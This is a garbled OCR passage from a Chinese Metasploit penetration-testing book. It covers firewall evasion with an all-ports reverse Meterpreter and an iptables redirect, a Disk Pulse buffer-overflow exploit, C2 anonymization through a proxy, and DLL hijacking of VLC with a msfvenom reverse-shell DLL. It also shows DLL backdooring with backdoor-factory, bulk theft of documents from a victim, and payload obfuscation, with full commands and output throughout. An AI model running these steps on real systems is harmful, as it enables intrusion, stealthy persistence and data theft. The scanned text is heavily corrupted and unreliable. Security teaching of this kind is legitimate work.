可 以 看 到 这 个 渗透 模块 运行 了 , 但 是 我 们 没有 获得 目标 的 控制 权限 , 这 是 因为 防火 墙 阻止 了 4444 
端口 上 的 会 话 流量 。 




















在 所 有 端口 上 使 用 反 向 的 Meterpreter 


为 了 规避 这 种 情况 , 我 们 将 会 使 用 windows/meterpreter/reverse_tcp_allports 模块 。 这 
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个 模块 会 


个 任务 。 


让 我 


可 以 看 到 ， 我 们 可 以 轻松 获得 了 控制 目标 的 Meterpreter 权限 。 我 们 成 功 规避 了 Windows 防火 墙 





xf 





这 种 方法 。 


sus 
来 观察 整 


尝试 测试 每 
4444， 所 以 需 Du E 


EET 


一 个 端口 ， 然 后 为 我 们 选择 一 个 没有 被 阻塞 的 端口 。 另 外 ， 








为 我 们 只 监听 




















rootGkali:-£ iptables -A PREROUTING -t nat -p tcp --dport 4444:7777 -j REDIRECT 
--to-port 4444 
root@kali:—# 目 


门 使 用 反 向 tcp Meterpreter 攻击 载荷 来 对 所 有 端口 再 次 执行 这 个 渗透 模块 。 











新 定向 到 4444 端口 上 。 通 过 如 下 图 所 示 的 命令 可 以 完 





Name Current Setting Required Description 

Proxies no A proxy chain of format type:host:port[,type:host:port][... 
RHOST 192.168.174.131 yes The target address 

RPORT 80 yes The target port (TCP) 

SSL false no Negotiate SSL/TLS for outgoing connections 

VHOST no HTTP server virtual host 


Payload options (windows/meterpreter/reverse tcp allports): 


Name Current Setting Required Description 

EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) 
LHOST 192.168.174.134 yes The listen address 

LPORT 4444 yes The starting port number to connect back on 


Exploit target: 


Id Name 


0 Disk Pulse Enterprise 9.0.34 


msf exploit(windows/http/disk pulse enterprise bof) > exploit 


[*] Started reverse TCP handler on 192.168.174.134:4444 

[*] Generating exploit... 

[*] Total exploit size: 21383 

[*] Triggering the exploit now... 

[*] Please be patient, the egghunter may take a while... 

[*] Sending stage (179779 bytes) to 192.168.174.131 

[*] Meterpreter session 3 opened (192.168.174.134:4444 -» 192.168.174.131:51929) at 2018-04-25 16:04:34 -0400 





meterpreter > 








端口 





Meterpreter 连接 。 当 管理 员 预 先 对 入 站 和 出 站 的 端口 进行 了 安全 设置 之 后 , 我 们 就 可 以 使 用 








^ue dud re 是 很 复杂 , 或 者 感到 十 分 困惑 。 让 我 们 使 用 Wireshark 





过 程 ， 这 一 切 在 数据 包 的 层次 下 就 容易 理解 多 了 。 





26 192. 
27 192. 
28 192. 
29 192 
30 192 
31 192 


33 192. 
34 192. 
35 192. 
36 192. 
37 192. 
38 192. 
39 192. 
40 192. 
41 192. 








































































































































































































192.168.174.134 TCP 80 39189 80-39189 [ACK] Seq-1 Ack-21567 win-53234 Len-0 TSval-4753550 TSecr-2957552355 
192.168.174.134 TCP 80 39189 [TCP window Update] 80-39189 [ACK] seq=1 Ack-21567 win-65160 Len=0 TSval=4753550 TSecr-2957552355 
192.168.174.134 TCP 51933 6667 51933-6667 [SYN] Seq=0 win-8192 Len=0 MSS-1460 SACK_PERM=1 

192.168.174.131 TCP 6667 51933 6667-51933 [SYN, ACK] Seq=0 Ack=1 win-29200 Len=0 MSS-1460 SACK_PERM=1 
192.168.174.134 TCP 51933 6667 51933-6667 bcd gems Ack=1 win-64240 Len=0 

192.168.174.131 IRC 6667 51933 Response 

192.168.174.131 IRC 6667 51933 Response 

192.168.174.131 IRC 6667 51933 Response 

192.168.174.131 IRC 6667 51933 Response 

192.168.174.131 IRC 6667 51933 Response 

192.168.174.131 IRC 6667 51933 Response 

192.168.174.131 IRC 6667 51933 Response 

192.168.174.131 IRC 6667 51933 Response 

192.168.174.131 IRC 6667 51933 Response 

192.168.174.131 IRC 6667 51933 Response (][ 














































































































[m mi 
192.168.174.134 TCP 51933 6667 51933-6667 Tace] Seg-l A 05 win-64240 Len=0 
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可 以 看 到 ， 最 开始 数据 从 我 们 的 Kali 计算 机 向 目标 的 SO 端口 上 发 送 ， 这 些 精心 构造 的 数据 导致 
了 目标 缓冲 区 的 洪 出 。 当 攻击 成 功 之 后 , 就 会 建立 一 条 从 目标 系统 到 我 们 Kali 计算 机 上 6667 端口 (被 
阻塞 端口 范围 之 外 的 第 一 个 端口 ) 的 控制 连接 。 男 外 ， 由 于 我 们 在 自己 的 Kali 机 上 将 从 4444 到 7777 
的 所 有 端口 都 映射 到 了 4444 端口 上 ， 所 有 来 自 这 些 端口 的 流量 都 将 最 终 返 回 到 端口 4444 E, 我们 最 
终 得 到 了 Meterpreter 的 控制 权限 。 


























9.4 小 结 


在 本 章 中 ,我们 学 习 了 使 用 自 定义 编码 器 的 杀毒 软件 规避 技术 , 绕 过 了 IDS 的 特征 匹配 过 滤 技 术 ， 
并 且 还 使 用 all-TCP-ports Meterpreter 模块 规避 了 防火 墙 的 端口 阻塞 机 制 。 
你 可 以 试 着 进行 如 下 练习 来 提高 你 的 规避 技巧 。 
a 尝试 在 攻击 载荷 中 使 用 延迟 执行 技术 ， 并 且 不 要 在 解码 器 中 使 用 sleep () 函数 ， 分 析 被 检测 
概率 的 变化 。 
O 在 你 的 攻击 载荷 中 尝试 使 用 其 他 逻辑 运算 符 ， 例 如 非 CNOT), XU 2X (double XOR), FH. 
使 用 简单 的 加 密 解密 算法 ， 例 如 ROT. 
口 规避 至 少 3 条 Snort 规则 ， 并 对 这 些 规则 进行 完善 。 
口 学 习 并 使 用 SSH 通道 技术 来 绕 过 防火 墙 。 
下 一 章 将 会 用 到 这 些 技 术 ， 我们 也 会 更 深入 地 领略 Metasploit 的 神奇 之 处 。 











































































































Metasploit 中 的 “特工 技术 








本 章 将 讲解 执法 机 构 常 用 的 各 种 技术 。 这 些 方 法 可 以 帮助 你 在 网 络 监听 和 攻击 领域 更 好 地 利用 
Metasploit。 本 章 将 着 眼 于 以 下 几 个 要 点 。 
口 在 渗透 过 程 中 保持 匿名 。 
口 在 攻击 载荷 中 使 用 代码 混淆 技术 。 
口 使 用 APT 技术 实现 控制 持久 化 。 
口 在 目标 系统 上 收集 文件 。 
口 Python 在 Metasploit 中 的 作用 。 


10.1 在 Meterpreter 会 话 中 保持 匿名 


如 果 你 是 为 执法 机 构 做 渗透 工作 ,那么 最 好 在 命令 和 控制 会 话 过 程 中 都 保持 匿名 。 大 多 数 执法 机 
构 都 会 使 用 VPS 服务 器 来 完成 命令 和 控制 会 话 , 这 一 点 对 于 匿名 来 说 是 十 分 方便 的 , 因为 在 它们 的 终 
端 都 是 通过 一 个 代理 隧道 接 入 网 络 的 。 不 过 由 于 在 你 和 你 的 目标 中 很 容易 加 入 一 个 代理 ， 所 以 执法 机 
构 往 往 也 无 须 考 虑 使 用 Metasploit。 


我 们 来 看 看 如 何 改变 这 种 情况 , 将 Metasploit 变 成 一 个 对 执法 机 构 来 说 不 仅 可 用 而 且 强 大 的 工具 。 
考虑 如 下 场景 。 

































































































































































代理 服务 器 公 网 IP: 171.61.156.61 
代理 服务 器 端口 : 808 
代理 服务 器 软件 : CCProxy 









































MSF handler 公 : 185.92.2xx.xxx 
MSF handlers O: 8443 














ii — gum 


目标 服务 器 公 网 IP: 106.215.26.19 





目标 内 部 IP: 192.168.1.16 
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在 这 个 案例 中 一 共有 三 个 公 网 IP。 我 们 的 目标 服务 器 IP 为 106.215.26.19, 我 们 使 用 的 Metasploit 
运行 在 IP 为 185.91.2xx.xxx 的 主机 的 8443 端口 上 。 我 们 可 以 通过 生成 一 个 内 置 代理 服务 的 反 向 HTTPS 
攻击 载荷 ， 来 利用 Metasploit 的 强大 功能 。 按 照 如 下 截图 所 示 来 创建 一 个 简单 的 代理 攻击 载荷 。 


rootGkali:-£ msfvenom -p windows/meterpreter/reverse https proxy HttpProxyHost=1 
71.61.156.61 HttpProxyPort-808 LH0ST-185.92.2]1: WW LPORT-8443 -f exe > band4. ex 
le 

No platform was selected, choosing Msf::Module::Platform::Windows from the paylo 
ad 

No Arch selected, selecting Arch: x86 from the payload 

No encoder or badchars specified, outputting raw payload 

Payload size: 399 bytes 

Final size of exe file: 73802 bytes 

rootQkali:-4£ 


可 以 看 到 ,我 们 已 经 将 Hr TPProxyHost 和 HTTPProxyPort 设置 为 代理 服务 器 的 卫 地 址 和 端口 ， 
这 是 一 个 运行 了 CCProxy 软件 的 Windows 操作 系统 。 整 个 过 程 如 下 图 所 示 。 


BBaBgBPgcHD 


Stop Options ^ Account Register Monitor Hide 





























Configuration 


[7] HTTP/RTSP 
回 Seaure 

EZ] FTP(Web) 
口 web Cached E Gopher 
[Remote Dial-up 口 socks/MmMs 
C Auto Startup OFP 

C] Telnet 








C News 





[Z] Auto Detect 192.168.116.1 


wmm | C 

















CCProxy 软件 是 一 款 运行 在 Windows 操作 系统 下 的 代理 服务 器 工具 。 我 们 可 以 轻松 地 在 这 个 工具 
中 配置 端口 和 认证 。 配 置身 份 验证 是 一 种 很 好 的 做 法 ,这 样 任何 人 在 没有 权限 的 情况 下 都 无 法 使 用 你 
的 代理 。 你 可 以 在 生成 攻击 载荷 时 ， 使 用 HttpProxyPass 和 HttpProxyUser 两 个 参数 来 指定 认证 
的 密码 和 用 户 名 。 接 下 来 ， 我 们 需要 在 185.92.2xx.xxx 上 启动 handler， 这 个 过 程 如 下 图 所 示 。 
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msf exploit(handler) > set LHOST 185.92.2 Nr 
set LHOST 185.92.2 NE 
msf exploit(handler) > set LHOST 185.92.2 Nr 


LHOST => 185.92.2 

msf exploit (handler) > set PayloadProxyHost 171.61.156.61Nr 
PayloadProxyHost -» 171.61.156.61 

msf exploit(handler) > set PayloadProxyPort 808\r 
PayloadProxyPort -» 808 

msf exploit(handler) > exploit -j\r 

[*] Exploit running as background job. 


[*] Started HTTPS reverse handler on https://185.92.2 :8443 
|[*] Starting the payload handler... 


.61.156.61; (UUID: wftgulve) Staging x86 payload (958531 bytes) 
2018-05-07 08:26:10 -0400 


Nr 
msf exploit(handler) » 











|msf exploit (handler) > [*] https://185.92.2 :8443 handling request from 171 


[*] Meterpreter session 1 opened (185.92.2 :8443 -» 171.61.156.61:45017) at| 





可 以 看 到 ， 我 们 快速 进入 了 代理 服务 器 。 这 意味 着 我 们 不 用 再 将 Metasploit 从 一 台 主 机 转移 到 另 
一 台 上 ， 而 且 可 以 轻松 地 在 这 些 代 理 服务 器 中 切换 。 检 查 一 下 我 们 handler 上 的 流量 ， 看 看 是 否 得 到 














T 目标 上 的 流量 。 





], seq 5707968:5708160, ack 9121, win 260, length 192 
], seq 5708160:5708352, ack 9121, win 260, length 192 
], seq 5708352:5708544, ack 9121, win 260, length 192 
], seq 5708544:5708736, ack 9121, win 260, length 192 
], seq 5708736:5708928, ack 9121, win 260, length 192 
], seq 5708928:5709120, ack 9121, win 260, length 192 
], seq 5709120:5709312, ack 9121, win 260, length 192 
: ack 5644576, win 4026, length 0 


], seq 5709312:5709504, ack 9121, win 260, length 192 





], seq 5709504:5709808, ack 9121, win 260, length 304 


08:49:35.792527 IP 185.92.2 ".ssh > 171.61.156.61.45331: 


08:49:35.792636 IP 185.92.2 ^ = .ssh > 171.61.156.61.45331: 


08:49:35.792753 IP 185.92.223.120.vultr.com.ssh » 171.61.156.61.45331: 


08:49:35.792855 IP 185.92.2. * ew.ssh > 171.61.156.61.45331: 


08:49:35.792974 IP 185.92.2. ^ o ww.ssh > 171.61.156.61.45331: 


08:49:35.793074 IP 185.92.2. ^ www.ssh > 171.61.156.61.45331: 


08:49:35.795255 IP 171.61.156.61.45331 » 185.9. — ce com. ssh: 


08:49:35.795272 IP 185.92.2 HN cw.ssh > 171.61.156.61.45331: 


08:49:35.795431 IP 185.92.2 w.ssh > 171.61.156.61.45331: 


Flags 
Flags 
Flags 
Flags 
Flags 
Flags 
Flags 
Flags 


Flags 











看 起 来 并 没有 。 我 们 获得 了 代理 服务 器 中 的 所 有 流量 。 我 们 刚刚 看 到 了 如 何 使 月 





Jil Metasploit 所 在 主机 的 匿名 化 。 


10.2 ”使 用 通用 软件 中 的 漏洞 维持 访问 权限 

















HARE 





服务 带 来 实 


DLL 加 载 顺 序 劫持 /DLL 植 人 是 我 最 喜欢 的 一 种 访问 权限 持久 化 技术 ， 利 用 它 不 仅 可 以 躲避 管理 











员 发 现 ， 同 时 还 能 保持 对 目标 的 长 时 间 控 制 。 下 面 就 来 讨论 这 一 技术 。 

















10.2.1 DLL 加 载 顺 序 劫持 


顾名思义 ,攻击 者 可 以 利用 “DLL 加 载 顺 序 劫持 ”漏洞 来 控制 程序 去 加 载 恶 意 的 DLL, 这 一 + 


利用 加 载 dll 目录 的 优先 级 来 实现 的 。 





、 





pn 
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大 多 数 情况 下 ， 软 件 一 旦 被 执行 ， 就 会 在 其 当前 文件 夹 和 System32 文件 夹 中 查找 DLL 文件 。 不 
过 ,软件 并 不 是 直接 从 System32 中 加 载 需 要 的 DLL 文件 ,而 是 只 有 在 当前 文件 夹 中 找 不 到 需要 的 DLL 
文件 时 ， 才 会 到 System32 中 查找 。 这 种 情况 可 以 被 攻击 者 利用 ， 他 们 只 需 将 恶意 的 DLL 文件 放置 在 
当前 文件 夹 中 , 这 样 , 由 于 当前 文件 夹 的 优先 级 高 于 System32 文件 夹 , 程序 就 会 直接 加 载 恶意 的 DLL 
文件 ， 而 不 会 从 System32 文件 夹 中 加 载 DLL 文件 。 下 图 可 以 帮助 你 更 好 地 理解 这 一 点 。 
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xx1.dll yldll | 
(未 找到 ) i! 


应 用 程序 文件 夹 System32 文 件 夹 





























从 上 图 中 可 以 看 到 ， 其 中 的 应 用 程序 一 旦 被 执行 ， 就 会 加 载 xx1、xx2 和 xx3 这 3 个 DLL 文件。 
另外 ， 应 用 程序 还 会 查找 yy1.dll 这 个 文件 ， 不 过 它 并 不 在 当前 目录 中 。 如 果 没 有 找到 这 个 文件 的 话 ， 
应 用 程序 就 需要 到 System32 目录 中 去 查找 。 现在 设想 攻击 者 已 经 将 一 个 名 为 yy1.dll 的 恶意 DLL 文件 
放置 到 了 应 用 程序 的 当前 文件 夹 中 。 这 样 ， 程 序 就 永远 不 会 跳 转 到 System32 文件 来， 而 是 会 直接 加 
载 攻击 者 放置 的 恶意 DLL 文件 ， 并 认为 这 个 文件 是 合法 的 。 这 种 攻击 一 旦 成 功 ， 攻 击 者 就 会 获得 目 
标 主 机 上 的 Meterpreter 控制 权限 。 下 面 我 们 就 在 一 个 常用 的 应 用 程序 ( 如 VLC 播放 器 ) 上 进行 测试 ， 
过 程 如 下 所 示 。 
root@kali:-# msfvenom -p windows/meterpreter/reverse tcp LHOST=192.168.10.108 LP 
ORT=8443 -f dll» CRYPTBASE.dll 
No platform was selected, choosing Msf::Module::Platform::Windows from the paylo 

d 
No Arch selected, selecting Arch: x86 from the payload 
No encoder or badchars specified, outputting raw payload 


Payload size: 341 bytes 
Final size of dll file: 5120 bytes 









































































































































rootGkali:-s$ li 


首先 创建 一 个 名 为 CRYPTBASE.dll 的 文件 。CRYPTBASE.dll 是 一 个 大 多 数 应 用 程序 都 会 使 用 的 
通用 文件 。 不 过 ，VLC 播放 器 应 该 到 System32 文件 夹 中 去 加 载 这 个 DLL 文件 ， 而 不 是 在 当前 文件 夹 
中 加 载 。 为 了 对 这 个 应 用 程序 进行 DLL 加 载 顺序 支持 ， 我 们 需要 将 这 个 文件 放置 到 VLC 播放 器 的 所 
在 目录 中 。 因 此 ，VLC 播放 器 在 自己 的 目录 中 就 可 以 找到 所 需 的 CRYPTBASE.dll 文件 ， 而 不 会 再 到 
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System32 目录 中 去 查找 ， 这 也 意味 着 它 将 会 执行 恶意 的 DLL 文件 ， 而 不 是 原来 的 DLL 文件 。 我 们 现 
在 正 通过 Meterpreter 来 控制 目标 ， 可 以 看 到 ， 目 标 上 VLC 播放 需 已 经 安装 好 了 ， 如 下 图 所 示 。 














meterpreter > pwd 

C: NUsersMpexMDownloads 
meterpreter » background 

[*] Backgrounding session 2... 


Imsf exploit(multi/handler) > use post/windows/gather/enum applications 
Imsf post(windows/gather/enum applications) > set SESSION 2 


SESSION => 2 


Imsf post(windows/gather/enum applications) > run 


[*] Enumerating applications installed on WIN-6FO9IRT3265 


Installed Applications 





Name Version 
Adobe Flash Player 29 ActiveX 29.0.0.140 
Disk Pulse Enterprise 9.0.34 9.0.34 


Google Chrome 


66.0.3359.139 


Google Toolbar for Internet Explorer 1.0.0 

Google Toolbar for Internet Explorer 7.5.8231.2252 
Google Update Helper 1.3.33.7 
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 9.0.30729.4148 
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319 10.0.30319 
Mozilla Firefox 43.0.1 (x86 en-US) 43.0.1 
Mozilla Maintenance Service 43.0.1 

Python 2.7.11 2.7.11150 

VLC media player 3.0.2 

VMware Tools 10.0.6.3595377 
WinPcap 4.1.3 4.1.0.2980 
Wireshark 2.6.0 32-bit 2.6.0 


Results stored in: 


/root/.msf4/lo0t/20180507125611 default 192.168.10.109 host.application 059119.txt 








[*] Post module execution completed 
Imsf post(windows/gather/enum applications) > 


浏览 VLC 目录 ， 并 将 这 个 恶意 DLL 放置 到 这 个 目录 中 。 








e 














meterpreter > cd 'C:\Program Files WideoLANNvlc' 


meterpreter > pwd 

C:\Program FiLes\VideoLANNVLc 

meterpreter > upload CRYPTBASE.dll 

[*] uploading : CRYPTBASE.dll -» CRYPTBASE.dll 

[*] Uploaded 5.00 KiB of 5.00 KiB (100.05): CRYPTBASE.dll -> CRYPTBASE.dll 
[*] uploaded : CRYPTBASE.dll -» CRYPTBASE.dll 

meterpreter > 


这 里 首先 使 用 ca 命令 切换 到 了 VLC 的 工作 目录 , 然后 将 恶意 的 DLL 文件 上 传 到 了 这 个 目录 中 。 
然后 为 DLL 文件 生成 一 个 handler， 整 个 过 程 如 下 图 所 示 。 

















Lj 








msf > use exploit/multi/handler 

msf exploit(multi/handler) > set payload windows/meterpreter/reverse tcp 
payload => windows/meterpreter/reverse tcp 

Imsf exploit(multi/handler) > set LHOST 192.168.10.108 

LHOST => 192.168.10.108 

Imsf exploit(multi/handler) > set LPORT 8443 

ORT => 8443 

Imsf exploit(multi/handler) > exploit -j 

[*] Exploit running as background job 4. 


[*] Started reverse TCP handler on 192.168.10.108:8443 
Imsf exploit(multi/handler) > jobs 


Id Name Payload Payload opts 


4 Exploit: multi/handler windows/meterpreter/reverse tcp tcp://192.168.10.108:8443 





Imsf exploit(multi/handler) > 
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一 切 搞定 。5 


拟 用 户 的 角色 ， 在 目标 计算 机 上 启动 这 个 VLC 播放 器 ， 





heterpreter > shell 

Process 1220 created. 

channel 2 created. 

Microsoft Windows [Version 6.1.7600] 


C:\Program Files WideoLANNvlc»dir 
dir 

Volume in drive C has no label. 
Volume Serial Number is 3A43-A02E 





95/07/2018 10:28 PM «DIR» 
95/07/2018 10:28 PM «DIR» 
4/19/2018 07:22 PM 20,213 
04/19/2018 09:19 PM 1,320,648 
4/19/2018 07:22 PM 18,431 
95/07/2018 10:28 PM 5,120 
95/07/2018 10:11 PM 56 
95/07/2018 10:11 PM «DIR» 
4/19/2018 09:11 PM 178,376 
4/19/2018 09:11 PM 2,664,136 
95/07/2018 10:11 PM <DIR> 
05/07/2018 10:11 PM <DIR> 
4/19/2018 07:22 PM 191,491 
95/07/2018 10:11 PM 65 
4/19/2018 09:19 PM 1,133,768 
95/07/2018 10:11 PM «DIR» 
4/19/2018 07:22 PM 2,816 
95/07/2018 10:11 PM «DIR» 
4/19/2018 07:22 PM 5,774 


Copyright (c) 2009 Microsoft Corporation. 


Directory of C:\Program Files WVideoLANWvlc 


AUTHORS. txt 
axvlc.dll 
COPYING.txt 
CRYPTBASE.dll 
Documentation.url 
hrtfs 
libvlc.dll 
libvlccore.dll 
locale 

lua 

NEWS. txt 

New Skins.url 
npvlc.dll 
plugins 
README. txt 
skins 
THANKS . txt 


All rights reserved. 








可 以 看 到 ， 我 们 的 DLL 文件 被 成 功 地 放置 在 了 文件 夹 中 。 我 们 通 





个 过 程 如 下 所 示 。 





C:\Program Files\VideoLAN\vlc>vlc.exe 


vlc.exe 





C:\Program Files\VideoLAN\vlc>f 


[*] Sending stage (179779 bytes) to 192.168.10.109 


C:\Program Files\VideoLAN\vlc>[*] Meterpreter session 3 opened (192.168.10.108:8 
443 -> 192.168.10.109:52939) at 2018-05-07 13:02:56 -0400 











太 棒 了 ! 可 以 看 到 ， 


一 旦 执行 了 vlc.exe， 我们 就 得 到 了 男 一 个 shell, 
系统 的 控制 权限 ， 只 要 有 人 执行 VLC 这 个 播放 器 ， 我 们 就 肯 





束 这 一 切 ! 我 们 现在 从 用 户 的 角度 来 回顾 这 个 过 程 ， 看 看 一 切 是 否 顺利 。 


定 可 以 获得 一 








只 要 有 人 局 MEN VLC 播放 器 ， 我 们 就 可 以 获得 对 他 的 shell 控制 权限 。 现 在 我 们 模 
这 个 过 程 如 下 所 示 。 


过 Meterpreter 来 运行 VLC， 这 


我 们 现在 已 经 成 功 获取 了 对 
。 但 是 不 要 太 早 结 
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目标 计算 机 看 起 来 好 像 很 正常 ， 但 是 并 没有 启动 VLC 播放 器 。 我 们 需要 设法 通过 某 种 方法 来 修 





复 这 个 VLC 播放 器 ， 因 为 一 个 失败 的 安装 过 程 可 能 导致 它 被 替换 或 者 重新 安装 。 但 是 VLC 播放 器 骨 





HT, HAEA CRYPTBASE.dl 文件 中 加 载 正确 的 函数 ， 这 是 因为 我 们 使 月 





























月 了 恶意 DLL 而 不 是 














原来 的 DLL 文件 。 为 了 克服 这 个 问题 , 我 们 将 使 用 后 门 工 厂 (backdoor factory ) 工具 来 在 原始 的 DLL 
文件 中 安装 后 门 ， 使 用 它 代 替 普 通 的 Meterpreter DLL 文件 。 这 表示 我 们 安装 了 后 门 的 DLL 文件 可 以 


fit VLC 播放 器 正常 工作 ， 同 时 还 会 为 我 们 提供 系统 的 控制 权限 。 


10.2.2 ”利用 代码 打 洞 技术 来 隐藏 后 门 程序 














代码 打 洞 技术 指 的 是 将 后 门 程序 隐藏 到 可 执行 程序 和 库 文件 的 代码 空闲 空间 中 。 该 方法 将 后 门 程 
序 隐 项 在 软件 的 空白 存储 区 域 ， 然 后 对 代码 进行 修改 ， 从 而 达到 启动 后 门 程序 的 目的 。 下 面 给 出 了 对 











CRYPTBASE.dll 文件 打 补 丁 的 做 法 。 








rootGkali:-£ backdoor-factory -f /root/Desktop/test-dll/cryptbase.dll -s iat rev| 
erse tcp inline -H 192.168.10.108 -P 8443 -o /mnt/hgfs/Share/cryptbase new.dll - 
Zz 
|C- C- 1 «.-) LC: 
| ( 00) (00).-7 _ . (00)( (00 ).-> ,> 
ee doa. Np ms SOC Cet 
| U NAN e sl /U'-.. )(00).-. '( 00) | 
| £p 72 €-» DE I TE Tl ICO LI gH 
1E 8 EHE 100] - 71] 17:WM DI IM DI I 
eel Tb ITAL MN P Ro UN UC RC 
LEO NN (s C-') 
«-. (00 ).-/ . ( 00) .-»  «-.(00 ) > 
(人 -')----- s\n / C---. ,]—--- 1) at 
(00 N---[ NP. 1 -0[| )( 00). | 7. "'C-7)'.* 
[doces p 42 Cu cCO LIE gH qtd 7 
XQ cm ELIT 0100 pp M DIH SUE EE 
buco | l IC EDU | | EAR ni] IN X. yA à 

Author: Joshua Pitts 

Email: the.midnite.runr[-at ]gmaiL<d o-t>com 

Twitter: — QGmidnite runr 

IRC: freenode.net £BDFactory 
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Kali Linux 中 已 经 安装 好 了 后 门 工厂 。 我 们 使 用 参数 -f 指定 了 要 打 补 丁 的 DLL 文件 ， 然 后 使 用 
-s 参数 指定 了 要 使 用 的 攻击 载荷 ， 使 用 -HE M-p 指定 了 要 使 用 的 IP 地址 和 端口 ， 而 参数 -o 指明 了 生 
成 的 文件 。 











qp 参数 -Z 表示 跳 过 可 执行 文件 的 签名 过 程 。 











当 这 个 后 门 加 入 过 程 开 始 时 ， 我 们 就 可 以 看 到 屏幕 显示 如 下 内 容 。 














[*] In the backdoor module 

[*] Checking if binary is supported 

[*] Gathering file info 

[*] Reading win32 entry instructions 

[*] Gathering file info 

[*] Overwriting certificate table pointer 

[*] Loading PE in pefile 

[*] Parsing data directories 

[*] Adding New Section for updated Import Table 
[!] Adding LoadLibraryA Thunk in new IAT 

[*] Gathering file info 

[*] Checking updated IAT for thunks 

[*] Loading PE in pefile 

[*] Parsing data directories 

[*] Looking for and setting selected shellcode 
[*] Creating win32 resume execution stub 

[*] Looking for caves that will fit the minimum shellcode length of 343 
[*] All caves lengths: 343 


可 以 看 到 , 后 门 工 三 工具 试图 在 DLL 文件 中 查找 一 个 长 度 为 343 或 者 更 大 的 空间 。 我 们 看 看 接 下 
来 都 显示 了 什么 。 





























[The following caves can be used to inject code and possibly 

continue execution. 

**Don't like what you see? Use jump, single, append, or ignore.** 
VETEHETEHETEHETEHETERHETEHETERH EHI IHHHBIHHHHHHHHHHHHHHHHHRRHNHN E 

[*] Cave 1 length as int: 343 

[*] Available caves: 

|l. Section Name: .data; Section Begin: 0xca00 End: 0xcc00; Cave begin: 0xca35 En 
Hd: Oxcbfc; Cave Size: 455 

2. Section Name: None; Section Begin: None End: None; Cave begin: 0xd644 End: 0x 
80a; Cave Size: 454 

B. Section Name: .reloc; Section Begin: 0xde00 End: 0xe800; Cave begin: 0xe62a E 
nd: 0xe7fc; Cave Size: 466 

pk okcoke okcoke okcokc ok okcoke okcokc ok okcoke okcokc okcokc ok ooo ok ok ok okcokc o o oko ok oko oo k kkk 


[!] Enter your selection: fj 


不 错 ! 我 们 找到 了 三 个 可 以 放置 shellcode 的 代码 洞 。 我 们 在 里 面 随便 选 一 个 ， 例 如 第 3 个 。 





























[!] Enter your selection: 3 

[!] Using selection: 3 

[*] Changing flags for section: .reloc 

[*] Patching initial entry instructions 

[*] Creating win32 resume execution stub 

[*] Looking for and setting selected shellcode 

File cryptbase new.dll is in the 'backdoored' directory 


可 以 看 到 , 现在 的 DLL 文件 已 经 被 植 人 了 后 门 , 这 表示 DLL 的 人 口 点 现在 指向 了 .reloc 代码 段 的 
shellcode 部 分 。 我 们 将 这 个 文件 放 在 Program Files 目录 中 受 攻击 软件 的 安装 目录 ,在 这 个 示例 中 就 是 
VLC. 它 将 正常 执行 ,而 不 是 像 在 上 一 节 看 到 的 那样 衣 溃 了 ,而 且 它 为 我 们 提供 了 对 主机 的 控制 权限 。 
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10.3 ”从 目标 系统 获取 文件 


Metasploit 中 提供 了 十 分 方便 的 文件 扫描 功能 。 后 渗透 模块 enum files 可 以 帮助 我 们 实现 文件 











收 











bo 


自动 化 。 下 面 给 出 了 这 个 模块 的 使 用 方法 。 





msf exploit(multi/handler) > use post/windows/gather/enum files 
Imsf post(windows/gather/enum files) > show options 


Module options (post/windows/gather/enum files): 


Name Current Setting Required Description 

FILE | GLOBS — *.config yes The file pattern to search for in a filename 
SEARCH FROM no Search from a specific location. Ex. C:\ 
SESSION yes The session to run this module on. 


Imsf post(windows/gather/enum files) > set FILE GLOBS *.docx OR *.pdf OR *.xlxs 
FILE GLOBS => *.docx OR *.pdf OR *.xlxs 

Imsf post(windows/gather/enum files) > set SESSION 5 

SESSION => 5 

Imsf post(windows/gather/enum files) > run 


[*] Searching C:NUsersV through windows user profile structure 
[*] Downloading C:NUsersMApexMDesktopVDocsVOWASP. Code Review Guide-Vl 1.pdf 

OWASP Code Review Guide-Vl l.pdf saved as: /root/.msf4/loot/20180509163834 default 192.168.10.109 host 
[*] Downloading C:NUsersMApex M Desktop Docs Report . docx 

Report.docx saved as: /root/.msf4/loot/20180509163836 default 192.168.10.109 host.files 403346.bin 
[*] Downloading C:NUsersMApex M Desktop Docs Vreport2(1) .docx 

report2(1).docx saved as: /root/.msf4/loot/20180509163836 default 192.168.10.109 host.files 693966.bin 
[*] Downloading C: NUsersM pex MDesktop Docs Vreport2.docx 

report2.docx saved as: /root/.msf4/loot/20180509163836 default 192.168.10.109 host.files 422383.bin 
[*] Done! 
[*] Post module execution completed 
Imsf post(windows/gather/enum files) > 目 





.files 624390.pdf 











如 图 所 示 ， 我 们 已 经 启动 了 enum files 后 渗透 测试 模块 ， 并 将 参数 FIL 











*.docx OR *.pdf OR * .xlsx， 这 表示 将 会 在 目标 系统 中 查找 以 上 三 种 格式 。 
的 值 设置 为 5， 这 没有 特殊 的 含义 ,只 是 用 来 定义 我 们 会 话 的 标识 符 。 可 以 看 到 ， 





E GLOBS 的 值 设置 为 
然后 我 们 将 SESSION 
运行 这 个 模块 之 后 ， 











它 就 会 开始 自动 地 在 目标 主机 上 搜索 所 有 符合 条 件 的 文件 ， 并 将 它们 下 载 到 我 们 的 计算 机 中 。 





10.4 ”使 用 venom 实现 代码 混淆 


前 一 章 已 经 介绍 了 如 何 使 用 自 定 义 编码 器 绕 过 杀毒 软件 。 接 下 来 再 深入 一 
用 Metasploit 中 的 加 密 和 代码 混淆 功能 。 这 次 我 们 将 会 用 到 一 个 很 酷 的 工具 ， 
接 下 来 使 用 venom 创建 一 些 加 密 的 Meterpreter shellcode。 
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Sin ertt. atalei 16lelnlelrlaltlelrl 

- CodeName: Pandora's box (pithos) - 





The author does not hold any responsibility for the bad use 
of this tool, remember that attacking targets without prior 
consent is illegal and punished by law. 


But to give to its users the first glance of how shellcode is 
build, embedded into one template (any language), obfuscated 
(e.g pyherion.py) and compiled into one executable file. 


| 
| 
The main goal of this tool its not to build 'FUD' payloads! | 
| 
'reproducing technics found in Veil,Unicorn,powersploit' | 


J 





| Author:r00t-3xplO0it | Suspicious Shell Activity (red team) 
上 VERSION:1.0.15 USER:root INTERFACE:ethO ARCH:x64 DISTRO:Kali 








Ü Press [ENTER] to continue .. 





， 来 研究 一 下 如 何 使 


E 它 的 名 字 叫 作 venom. 
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当 你 在 Kali Linux 中 启动 了 venom 之 后 ， 就 可 以 看 到 它 如 上 图 所 示 的 启动 界面 。 这 个 venom 是 
